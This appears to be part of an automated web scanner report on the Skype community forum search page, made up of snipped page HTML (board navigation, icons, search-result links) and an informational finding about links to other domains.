   <img class="lia-node-icon" title="Category" id="imagedisplay_11" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:de_computer lia-js-data-coreNodeDisplayId-de_computer lia-component-forums-widget-community-node-tree-item" id="link_29" href="/t5
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_12" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_general lia-js-data-coreNodeDisplayId-de_general lia-component-forums-widget-community-node-tree-item" id="link_30" href="/t5/Allg
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_13" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_payment lia-js-data-coreNodeDisplayId-de_payment lia-component-forums-widget-community-node-tree-item" id="link_31" href="/t5/Zahl
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_14" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_mobile_smartphones lia-js-data-coreNodeDisplayId-de_mobile_smartphones lia-component-forums-widget-community-node-tree-item" id="l
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_15" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:de_hardware lia-js-data-coreNodeDisplayId-de_hardware lia-component-forums-widget-community-node-tree-item" id="link_33" href="/t5/Sk
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_16" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:fr lia-js-data-coreNodeDisplayId-fr lia-component-forums-widget-community-node-tree-item" id="link_35" href="/t5/Fran%C3%A7ais/ct-
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_17" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_general lia-js-data-coreNodeDisplayId-fr_general lia-component-forums-widget-community-node-tree-item" id="link_36" href="/t5/La-c
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_18" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_community lia-js-data-coreNodeDisplayId-fr_community lia-component-forums-widget-community-node-tree-item" id="link_37" href="/t5/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_19" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_hardware lia-js-data-coreNodeDisplayId-fr_hardware lia-component-forums-widget-community-node-tree-item" id="link_38" href="/t5/Le
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_20" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fr_products lia-js-data-coreNodeDisplayId-fr_products lia-component-forums-widget-community-node-tree-item" id="link_39" href="/t5/Le
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_21" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:pt lia-js-data-coreNodeDisplayId-pt lia-component-forums-widget-community-node-tree-item" id="link_41" href="/t5/Portugu%C3%AAs/ct
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_22" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:pt_platforms lia-js-data-coreNodeDisplayId-pt_platforms lia-component-forums-widget-community-node-tree-item" id="link_43" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_23" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_general lia-js-data-coreNodeDisplayId-pt_general lia-component-forums-widget-community-node-tree-item" id="link_44" href="/t5/T%C3
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_24" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_payment lia-js-data-coreNodeDisplayId-pt_payment lia-component-forums-widget-community-node-tree-item" id="link_45" href="/t5/Form
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_25" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:pt_business lia-js-data-coreNodeDisplayId-pt_business lia-component-forums-widget-community-node-tree-item" id="link_46" href="/t5/Sk
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_26" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:it lia-js-data-coreNodeDisplayId-it lia-component-forums-widget-community-node-tree-item" id="link_48" href="/t5/Italiano/ct-p/it"
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_27" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_payment lia-js-data-coreNodeDisplayId-it_payment lia-component-forums-widget-community-node-tree-item" id="link_49" href="/t5/Paga
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_28" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_general lia-js-data-coreNodeDisplayId-it_general lia-component-forums-widget-community-node-tree-item" id="link_50" href="/t5/Disc
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_29" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_support lia-js-data-coreNodeDisplayId-it_support lia-component-forums-widget-community-node-tree-item" id="link_51" href="/t5/Supp
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_30" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_community lia-js-data-coreNodeDisplayId-it_community lia-component-forums-widget-community-node-tree-item" id="link_52" href="/t5/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_31" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:it_mac lia-js-data-coreNodeDisplayId-it_mac lia-component-forums-widget-community-node-tree-item" id="link_53" href="/t5/Utenti-Mac/b
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_32" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:es lia-js-data-coreNodeDisplayId-es lia-component-forums-widget-community-node-tree-item" id="link_55" href="/t5/Espa%C3%B1ol/ct-p
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_33" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:es_platforms lia-js-data-coreNodeDisplayId-es_platforms lia-component-forums-widget-community-node-tree-item" id="link_57" href="/
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_34" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_payment lia-js-data-coreNodeDisplayId-es_payment lia-component-forums-widget-community-node-tree-item" id="link_58" href="/t5/P%C3
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_35" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_general lia-js-data-coreNodeDisplayId-es_general lia-component-forums-widget-community-node-tree-item" id="link_59" href="/t5/Disc
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_36" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:es_hardware lia-js-data-coreNodeDisplayId-es_hardware lia-component-forums-widget-community-node-tree-item" id="link_60" href="/t5/Ac
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_37" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:jp lia-js-data-coreNodeDisplayId-jp lia-component-forums-widget-community-node-tree-item" id="link_62" href="/t5/%E6%97%A5%E6%9C%A
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_38" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:jp_general lia-js-data-coreNodeDisplayId-jp_general lia-component-forums-widget-community-node-tree-item" id="link_63" href="/t5/%E6%
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_39" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru lia-js-data-coreNodeDisplayId-ru lia-component-forums-widget-community-node-tree-item" id="link_65" href="/t5/%D0%A0%D1%83%D1%8
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_40" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_account lia-js-data-coreNodeDisplayId-ru_account lia-component-forums-widget-community-node-tree-item" id="link_67" href="/t5/%
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_41" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_community lia-js-data-coreNodeDisplayId-ru_community lia-component-forums-widget-community-node-tree-item" id="link_69" href="/
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_42" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_mobile lia-js-data-coreNodeDisplayId-ru_mobile lia-component-forums-widget-community-node-tree-item" id="link_71" href="/t5/Sky
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_43" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:ru_general_board lia-js-data-coreNodeDisplayId-ru_general_board lia-component-forums-widget-community-node-tree-item" id="link_73"
...[SNIP]...
</a>
   <img class="lia-node-icon" title="Category" id="imagedisplay_44" src="http://skypec.i.lithium.com/skins/images/3CBB9A779D47CAD2D1B9102948950739/base/images/icon_category.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Category:fb_en lia-js-data-coreNodeDisplayId-fb_en lia-component-forums-widget-community-node-tree-item" id="link_75" href="/t5/Facebook/ct
...[SNIP]...
<li>
   <img class="lia-node-icon" title="Message Board" alt="There are no unread messages in this message board" id="imagedisplay_45" src="http://skypec.i.lithium.com/skins/images/7B3FDA115FE20807D387FD9B79AD82BD/base/images/icon_board.png"/>
   <a class="lia-link-navigation lia-js-data-coreNodeTypeAndId-Board:fb_en_app lia-js-data-coreNodeDisplayId-fb_en_app lia-component-forums-widget-community-node-tree-item" id="link_76" href="/t5/Facebo
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_77" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_1" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_78" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_2" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_79" href="#"><img class="" id="display_3" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_81" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_4" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_82" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_5" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_83" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_6" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_84" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_7" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_85" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_8" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_86" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_9" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a class="lia-link-navigation lia-form-fieldset-toggle" id="link_87" href="#"><img class="" title="Toggle Close" alt="Toggle Close" id="display_10" src="http://skypec.i.lithium.com/skins/images/F941FFDE452801903B8D5055904D5977/base/images/icon_toggle_open.png"/></a>
           <a class="lia-link-navigation lia-form-fieldset-toggle lia-js-hidden" id="link_88" href="#"><img class="" title="Toggle Open" alt="Toggle Open" id="display_11" src="http://skypec.i.lithium.com/skins/images/77D3E9B8424B1CA1020EF4271C42C7E7/base/images/icon_toggle_closed.png"/></a>
...[SNIP]...
<a id="advancedSearchPanel" href="#">
               <img class="lia-panel-heading-bar-controls-icon-maximize" style="display:none" title="Show" id="controlsMax" src="http://skypec.i.lithium.com/skins/images/271C13B8648D69AC6D1620FA03A61C16/base/images/icon_panel_maximize.png"/>    
               <img class="lia-panel-heading-bar-controls-icon-minimize" style="display:block" title="Hide" id="controlsMin" src="http://skypec.i.lithium.com/skins/images/E7B378E50AFBEEB9E5E71D8FCD1066D6/base/images/icon_panel_minimize.png"/>    
           </a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_89" href="#"><img class="" id="display_12" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_91" href="#"><img class="" id="display_13" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_93" href="#"><img class="" id="display_14" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_95" href="#"><img class="" id="display_15" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
<a class="lia-link-navigation help-icon lia-tooltip-trigger" id="link_97" href="#"><img class="" id="display_16" src="http://skypec.i.lithium.com/skins/images/CD42447200EF353C90A0578E1A3693D4/base/images/icon_help.png"/></a>
...[SNIP]...
ink_100" href="/t5/forums/searchpage/tab/message?advanced=true&amp;filter=acceptedSolutions%2CsolvedThreads&amp;location=Category%3AEnglish&amp;solution=true&amp;solved=true&amp;sort_by=-solutionDate"><img class="" title="Remove" alt="Remove" id="display_17" src="http://skypec.i.lithium.com/skins/images/BC36DEC605FE10E8B92393A09CF7696A/base/images/button_inline_delete.png"/></a>
...[SNIP]...
ink_103" href="/t5/forums/searchpage/tab/message?advanced=true&amp;filter=acceptedSolutions%2CsolvedThreads&amp;location=Category%3AEnglish&amp;solution=true&amp;solved=true&amp;sort_by=-solutionDate"><img class="" title="Remove" alt="Remove" id="display_18" src="http://skypec.i.lithium.com/skins/images/BC36DEC605FE10E8B92393A09CF7696A/base/images/button_inline_delete.png"/></a>
...[SNIP]...
ink_106" href="/t5/forums/searchpage/tab/message?advanced=true&amp;filter=acceptedSolutions%2CsolvedThreads&amp;location=Category%3AEnglish&amp;solution=true&amp;solved=true&amp;sort_by=-solutionDate"><img class="" title="Remove" alt="Remove" id="display_19" src="http://skypec.i.lithium.com/skins/images/BC36DEC605FE10E8B92393A09CF7696A/base/images/button_inline_delete.png"/></a>
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_20" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_21" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_22" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview" href="/t5/Windows/Multiple-Skype-Accounts/m-p/134286/highlight/true#M14571">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_23" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_24" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_25" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_0" href="/t5/Subscriptions/Call-between-2-computers-on-the-same-account/m-p/130236/highlight/true#M2766">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_26" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_27" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_28" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_1" href="/t5/Windows/skype-not-doadloading-via-help-and-check-for-update-and-Facebook/m-p/133388/highlight/true#M14447">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_29" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_30" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_31" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_2" href="/t5/Payments-and-Billing/Subscription-costs-refundment/m-p/132574/highlight/true#M3532">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_32" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_33" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_34" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_3" href="/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/132728/highlight/true#M14369">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_35" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_36" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_37" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_4" href="/t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130138/highlight/true#M14048">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_38" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_39" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_40" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_5" href="/t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87930/highlight/true#M9178">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_41" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_42" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_43" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_6" href="/t5/Windows/Skype-fails-to-log-me-in/m-p/132364/highlight/true#M14342">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_44" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_45" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_46" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_7" href="/t5/Windows/Update-Skype/m-p/132328/highlight/true#M14338">
...[SNIP]...
<div class="search-result-message-icon">
                       <img class="" title="Topic" alt="There are no new messages in this topic" id="display_47" src="http://skypec.i.lithium.com/skins/images/3663AFAE585B432DF75A67342E97725A/base/images/icon_thread.png"/>
                   </div>
...[SNIP]...
<div class="search-result-message-subject">
               
                   
                       <img class="" title="Accepted Solution" alt="Accepted Solution" id="display_48" src="http://skypec.i.lithium.com/skins/images/F6A53F07055C1BAD974348396CC20CCE/base/images/message_type_solved.png"/>
                   
               
               <h2 class="lia-message-subject">
...[SNIP]...
<li>
                               <img class="" id="display_49" src="http://skypec.i.lithium.com/skins/images/A5E556933B98E7F5A6FA57454FC089CB/base/images/message_type_solution.png"/>
                               <a class="lia-link-navigation" id="topResultLinkInPreview_8" href="/t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132306/highlight/true#M14330">
...[SNIP]...
<div class="LithiumLogo lia-component-common-widget-lithium-logo" class="LithiumLogo">
   <a class="lia-link-navigation" title="Social CRM &amp; Community Solutions Powered by Lithium" target="_blank" id="lithiumLogoLink" href="http://www.lithium.com/"><img class="" title="Social CRM &amp; Community Solutions Powered by Lithium" alt="Powered by Lithium" id="display_50" src="http://skypec.i.lithium.com/skins/images/7CE6893D65E55F411F0162C285E0145B/base/images/button_lithium_logo.png"/></a>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js"></script>
...[SNIP]...

17.21. http://community.skype.com/t5/forums/searchpage/tab/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

